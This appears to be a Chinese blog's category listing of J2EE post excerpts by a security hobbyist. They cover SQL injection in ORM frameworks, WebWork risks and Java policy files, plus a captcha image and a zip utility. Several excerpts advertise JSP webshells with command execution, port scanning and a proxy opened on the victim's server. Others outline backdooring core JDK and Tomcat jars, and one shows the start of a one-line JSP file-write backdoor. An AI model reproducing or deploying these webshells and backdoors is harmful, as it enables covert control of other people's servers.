随笔分类 -  J2EE

摘要：author : kj021320team : I.S.T.O0. 只给思路不给代码1. 对于JDK本身修改核心类包。如rt.jar 替换掉 java.lang.String或者java.lang.Object2. 对于JAVAEE WEBSERVER替换核心lib的jar 。如TOMCAT 的 jasper-runtime.jar 的org.apache.jasper.runtime.JspWriterImpl3. 插入代码自己的默认执行shell代码。如构造函数，静态域 static{ [kj021320.code] }4.调用jni so/dll 以操作javaapi之外的。如proce 阅读全文

摘要：Author:kj021320转载请注名出处。Java应用程序环境的安全策略，详细说明了对于不同的代码所拥有的不同资源的许可，它由一个Policy对象来表达。为了让applet（或者运行在SecurityManager下的一个应用程序）能够执行受保护的行为，例如读写文件，applet（或Java应用程序）必须获得那项操作的许可,安全策略文件就是用来实现这些许可。Policy对象可能有多个实体，虽然任何时候只能有一个起作用。当前安装的Policy对象，在程序中可以通过调用 getPolicy方法得到，也可以通过调用setPolicy方法改变。Policy对象评估整个策略，返回一个适当的Permi 阅读全文

摘要：Author : kj021320Team : I.S.T.O台上 kj021320穿着一套便服，一点都不像安全技术人员...台下一群 黑客 骇客 红客 白客 砍客 蓝客 灰客 漂客...还有一堆开发工程师和架构师 貌似很期待的在听课，接收kj021320的培训kj021320 : hi,大家好...今天我要跟大家一起讨论的是SQL注射...台下一片郁闷声响起有位骇客郁闷道 : 哎~咋又是注射！现在都快绝种的了啊！大企业都用JAVA DOTNET参数绑定，其他的公司都过滤了单引号，数字的就进行类型转换，哪来注射啊？大哥！...kj021320 : .... ....kj021320 : 只要使 阅读全文

摘要：TEAM : I.S.T.OAUTHOR : kj021320官方BLOG : http://blog.csdn.net/I_S_T_O转载需注明作者,未经作者同意,不得用于任何形式的商业活动现在越来越流行ORM技术~~~程序员把有关数据库的操作都交给持久层去处理,也为了更方便所以框架也提供了另外对象查询语言例如HIBERNATE的HQL EJB的EJBQL等这是好事吗？恩 的确很好~对于严谨的程序员来说！但是对于那些对技术一知半解的就不一定了！或者对于那些偷懒的人来说更是糟糕的事情以下我分别采用3大常用的持久层框架,加上代码的片段Ibatis<select id="unsaf 阅读全文

摘要：TEAM : I.S.T.OAUTHOR : KJ021320转载需注明作者,未经作者同意,不得用于任何形式的商业活动WebWork是由OpenSymphony组织开发的，致力于组件化和代码重用的拉出式MVC模式J2EE Web框架。框架本身就是抽象空实现的！一般很少会给程序带来0day漏洞,但是因为WebWork的设计方式 潜伏着一定的安全隐患.开发者一点要注意下面我们来分析他的设计,以及流程逻辑...首先 xwork.xml是它的一个核心配置文件 里面记载着 存储表单数据的javabean,处理业务逻辑的action,流程跳转的到jsp视图处理OK 以下有一个配置<action na 阅读全文

摘要：昨天叫LIVING帮忙扫描几个IP 覆盖全部端口~~~他老抱怨说XSCAN支持多核CPU不理想,整天出错！我郁闷之下开发了个WEBSHELL上面扫描的程序,直接把IP 添加到 作业系统那里~让服务器自动扫描！即使我们关了浏览器...！我们过N天之后上去看看扫描结果就OK~~ 不用管它了 自己忙自己的事！....平台兼容: RESIN TOMCAT WEBLOGIC WEBSPHERE JBOSS程序未来展望：开发对于数据库暴力破解 ,SSH暴力破解 , MD5暴力破解！多个WEBSHELL通讯进行分布式 以下为代码:<%@page import="java.util.*,jav 阅读全文

摘要：生成有4个随机数字和杂乱背景的图片，数字和背景颜色会改变，服务器端刷新（用history.go(-1)也会变）产生验证码图片的文件-----image.jsp<%@ page contentType="image/jpeg" import="java.awt.*,java.awt.image.*,java.util.*,javax.imageio.*" %><%!Color getRandColor(int fc,int bc){//给定范围获得随机颜色 Random random = new Random(); if(fc>25 阅读全文

摘要：功能如下文件: 复制 移动 修改日期 删除 编辑 下载 上传 新建目录: 复制 移动 修改日期 打包zip 新建系统: 查看系统信息 环境变量信息 容器信息杂项: 运行(系统命令/文件) API类反射 扫描远程机器端口 开启本机HTTP代理数据库: 查看数据库信息 查看数据库函数 查看数据库存储过程 执行SQL其中开启 HTTP代理由为特出~ 呵呵 只要别人一运行了 这个JSP 页面 就等于在对方服务器开启了 1个端口作为HTTP代理 以供我们IE 使用~呵呵~爽... 其中 JAVA1.4版本 以上测试Ok 以/**/ 注释的为未开启功能 取掉注释即可//以下为代码///////////// 阅读全文

摘要：...之前的原创都给人家抬走了！真郁闷.这次 在这里说明~ [转载请注名 無名氏nonamed 作品]java是 面向对象编程的语言了！ 啥都是对象！基于编译与解析之间~~-_- ... 估计没有eval execute这样功能的函数了！...但是还是可以留一句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了！郁闷！后来没有办法~~ 算了~~ 这样实现吧！<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath(" 阅读全文

摘要：zip方法 zipPath参数为保存zip的文件路径 srcPath参数为需要压缩的目录 在linux window上面测试无问题！主要是编码问题比较麻烦~要是有其他异常 请留言 或者 有什么更好的方法 欢迎给更多的意见//zip zhe foldervoid zip(String zipPath, String srcPath,javax.servlet.jsp.JspWriter out) throws Exception { FileOutputStream output = null; ZipOutputStream zipOutput = null; try{ output = ne 阅读全文

摘要：本来打算在控制台就OK了！但是效果不好看！在jsp上面写了一个管理类！还没有完全完工的！就是显示数据库表 存储过程 还有基本信息而已...代码如下//database manager classclass DBM{ private javax.servlet.jsp.JspWriter out; private Connection con; private Statement stmt; private ResultSet rs; public DBM(String driverName,String url,String userName,String passWord,javax.ser 阅读全文